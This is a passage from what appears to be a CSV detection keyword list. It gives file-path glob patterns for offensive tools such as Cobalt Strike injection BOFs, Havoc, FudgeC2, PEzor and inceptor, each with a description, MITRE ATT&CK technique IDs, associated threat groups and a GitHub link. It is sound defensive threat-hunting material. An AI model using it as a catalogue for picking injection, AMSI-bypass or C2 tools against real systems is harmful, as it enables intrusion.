Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/implant/register_cmd*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/implants/*/Syscalls.*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/ImplantSSP.exe*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/impress-remote-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/inceptor.git*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/inceptor.git*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/infection_monkey/*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/Infoga*,offensive_tool_keyword,Infoga,Email Information Gathering.,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/m4ll0k/Infoga,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*/informix-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/informix-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/informix-tables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/inject.cpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/Inject/Dll/LoadDll*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/Inject/PE/*.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/Inject/ShellCode/*.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/injectAmsiBypass/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectAmsiBypass,1,1,N/A,10,10,362,67,2023-03-08T15:54:57Z,2021-07-19T00:08:21Z -*/inject-assembly/*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*/injectEtw.*,offensive_tool_keyword,cobaltstrike,CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectEtwBypass,1,1,N/A,10,10,253,54,2021-09-28T19:09:38Z,2021-09-21T23:06:42Z -*/Injection/clipboard/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/conhost/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/createremotethread/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/ctray/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/dde/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/Injection.cna*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/kernelcallbacktable*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/ntcreatethread*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/ntcreatethread/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/ntqueueapcthread*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/setthreadcontext*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/svcctrl/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/tooltip/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z 